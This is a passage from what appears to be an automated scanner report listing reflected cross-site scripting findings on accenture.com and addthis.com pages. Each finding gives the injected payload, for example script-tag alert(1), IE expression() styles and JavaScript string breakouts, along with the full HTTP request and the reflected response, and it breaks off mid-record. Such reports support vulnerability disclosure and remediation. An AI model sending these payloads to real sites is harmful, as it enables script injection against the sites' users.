The value of the ie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5302b"><script>alert(1)</script>4aa0ca64ae9 was submitted in the ie parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67196


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
D-A267-A21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf85302b"><script>alert(1)</script>4aa0ca64ae9&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.132. http://www.accenture.com/accenture/search/search.aspx [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a4d"><script>alert(1)</script>ca532dd932b was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=41a4d"><script>alert(1)</script>ca532dd932b&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:37 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67197


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
ooter=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations&lr=41a4d"><script>alert(1)</script>ca532dd932b&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.133. http://www.accenture.com/accenture/search/search.aspx [oe parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the oe request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adbc3"><script>alert(1)</script>6f380d9deb9 was submitted in the oe parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:38 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
21C9A8123B3&topnav=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8adbc3"><script>alert(1)</script>6f380d9deb9&output=xml_no_dtd&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.134. http://www.accenture.com/accenture/search/search.aspx [output parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the output request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b150"><script>alert(1)</script>a28362fa3c1 was submitted in the output parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:35 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
=66DB0E54-2B4B-43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd8b150"><script>alert(1)</script>a28362fa3c1&search_in=main&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.135. http://www.accenture.com/accenture/search/search.aspx [search_in parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the search_in request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a86ff"><script>alert(1)</script>74b31afde1a was submitted in the search_in parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:44 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67198


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
43BE-88B3-476A9B560C03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=maina86ff"><script>alert(1)</script>74b31afde1a&site=main_locations&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.136. http://www.accenture.com/accenture/search/search.aspx [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.accenture.com
Path:   /accenture/search/search.aspx

Issue detail

The value of the site request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 522c2"><script>alert(1)</script>af5239f4278 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /accenture/search/search.aspx?filter=1&getfields=*&ie=utf8&output=xml_no_dtd&client=accenture&lr=&oe=utf8&proxycustom=&site=main_locations522c2"><script>alert(1)</script>af5239f4278&search_in=main&search_main=all&search_location_text=&original_location=&q= HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:48:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:48:43 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: cache
Pragma: no-cache
Content-Length: 67195


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>
           Search</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="
...[SNIP]...
03&footer=9E541954-D5F8-4EC6-AF22-9FF473A55D70&channel=&original_location=&searchmode=Advanced&client=accenture&filter=1&getfields=*&ie=utf8&oe=utf8&output=xml_no_dtd&search_in=main&site=main_locations522c2"><script>alert(1)</script>af5239f4278&lr=&q=&num=&sort=" Id="SiteSearchControlStandard_lbtnBasicAdvancedLink" Title="Advanced Search" Class="searchbod" >
...[SNIP]...

1.137. https://www.accenture.com/accenture/registration/PrintThis.aspx [windowTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the windowTitle request parameter is copied into the HTML document as plain text between tags. The payload 931a7<x%20style%3dx%3aexpression(alert(1))>96a5af8d84d44cce5 was submitted in the windowTitle parameter. This input was echoed as 931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda931a7<x%20style%3dx%3aexpression(alert(1))>96a5af8d84d44cce5&button=show+response&renderableItem=%2Fshow%2F1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Cookie: Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US
Host: www.accenture.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 17:15:19 GMT
Connection: keep-alive
Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:19 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 8297

<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda931a7<x style=x:expression(alert(1))>96a5af8d84d44cce5</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HT
...[SNIP]...

1.138. https://www.accenture.com/accenture/registration/PrintThis.aspx [windowTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda was submitted in the windowTitle parameter. This input was echoed as 6a17b</title><x style=x:expression(alert(1))>1898685ddda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=Submit6a17b</title><x%20style%3dx%3aexpression(alert(1))>1898685ddda HTTP/1.1
Host: www.accenture.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UrlTracker=ReferrerPageURL=EAN.aspx&Content=Thank you for updating your feature and newsletter subscriptions on accenture.com. <br/> Your current features are:&ThankYouPageTitle=Confirmation&ReferrerPageTitle=E-mail Alerts and Newsletters&ThankYouPageType=ean; Commerce2002_TestPersistentCookie=TestCookie; Commerce2002_TestSessionCookie=TestCookie; UserPref=Culture^en-US; FormSubmitURL=/Global/Registration/Accenture_Feedback_TY; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Date: Sun, 21 Nov 2010 16:47:05 GMT
Content-Length: 8127
Connection: close
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 16:47:05 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache

<title>Submit6a17b</title><x style=x:expression(alert(1))>1898685ddda</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>PrintThis</title>
       
       <meta
...[SNIP]...

1.139. https://www.accenture.com/accenture/registration/PrintThis.aspx [windowTitle parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.accenture.com
Path:   /accenture/registration/PrintThis.aspx

Issue detail

The value of the windowTitle request parameter is copied into the HTML document as text between TITLE tags. The payload 71140</title><x%20style%3dx%3aexpression(alert(1))>22cfa4275fecd007f was submitted in the windowTitle parameter. This input was echoed as 71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /accenture/registration/PrintThis.aspx?GUID={13DF5E01-389F-4013-BC36-296A775C1FE5}&footerGuid=9E541954-D5F8-4EC6-AF22-9FF473A55D70&authorContext=PresentationPublished&channelguid={4FDF0FFF-C188-490F-AEA1-A93A6B40D85B}&windowTitle=71140</title><x%20style%3dx%3aexpression(alert(1))>22cfa4275fecd007f&button=show+response&renderableItem=%2Fshow%2F1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Cookie: Commerce2002_TestPersistentCookie=TestCookie; MSCSProfile=B9CAF61F501232A3EE72991FDFC68CC405D4867ED45858AF0703C3FEDA7C1648E0D7976F6DAABFAF253FC9390B9B4A08EC215B53CDE54CF88D1B580F127CBD1D81340063F30B8FFEDC74F8161BCF11329C7D3B8498339A152118B951906347B01B9B3F1529B0DF9CE2A1E25128666629718AA404E0DE2E89D2C0735837A4915F; UserPref=Culture^en-US
Host: www.accenture.com
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 21 Nov 2010 17:15:36 GMT
Connection: keep-alive
Set-Cookie: Commerce2002_TestSessionCookie=TestCookie; path=/
Set-Cookie: UserPref=Culture^en-US; expires=Mon, 21-Nov-2011 17:15:36 GMT; path=/
Cache-Control: no-cache
Expires: -1
Pragma: no-cache
Pragma: no-cache
Content-Length: 8183

<title>71140</title><x style=x:expression(alert(1))>22cfa4275fecd007f</title>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>PrintThis</title>
       
       <meta
...[SNIP]...

1.140. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51be1"-alert(1)-"86235a760be was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php51be1"-alert(1)-"86235a760be HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 17:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=5jcqmj343pegjkpgcn6sniqk25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php51be1"-alert(1)-"86235a760be";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

1.141. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 32c01<script>alert(1)</script>1eff1198961 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php32c01<script>alert(1)</script>1eff1198961 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 21 Nov 2010 17:13:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=4l75jifc1vmjsl9ceq8smd6no3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php32c01<script>alert(1)</script>1eff1198961</strong>
...[SNIP]...

1.142. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ba68"-alert(1)-"56e962f9ff9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/5ba68"-alert(1)-"56e962f9ff9 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
